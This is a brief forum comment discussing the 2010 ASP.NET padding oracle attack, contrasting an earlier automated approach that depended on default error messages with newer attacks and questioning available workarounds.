|
|
|
|
|
|
by storm
5750 days ago
|
|
|
Brian Holyfield claims to have been doing it for a bit (http://www.gdssecurity.com/l/b/2010/09/14/automated-padding-...), although his approach seems to have relied upon default error emissions and is defeated by the common customErrors=on configuration. It doesn't sound like today's attacks have such limitations. And it isn't clear what actual effective workarounds exist, if any. Even in cases where app logic will trip this approach up early (making hard assumptions about session vals having been initialized post-login and consequently failing fast, etc), the secrets are still captured. |
|
|